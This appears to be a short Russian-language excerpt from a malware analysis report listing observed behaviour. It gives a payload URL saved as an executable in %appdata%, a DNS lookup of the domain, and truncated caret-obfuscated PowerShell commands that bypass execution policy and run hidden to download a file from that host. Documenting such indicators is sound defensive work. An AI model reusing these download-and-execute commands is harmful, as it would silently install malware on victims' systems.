Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^ER^sHeLL.^EXE -Ex^E^cUt^IOnPoliCy BY^Pa^s^S^ -N^o^p^Rof^Ile^ ^-^wi^ndO^WsTY^lE HId^den ^(nEw-^O^Bj^ec^T^ system^.n^e^T^.WeBCLie^N^T^).d^O^WNL^OA^DFIle('http://www.do...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pOW^ER^sHeLL.^EXE -Ex^E^cUt^IOnPoliCy BY^Pa^s^S^ -N^o^p^Rof^Ile^ ^-^wi^ndO^WsTY^lE HId^den ^(nEw-^O^Bj^ec^T^ system^.n^e^T^.WeBCLie^N^T^).d^O^WNL^OA^DFIle('http://www.do...' (со скрытым окном)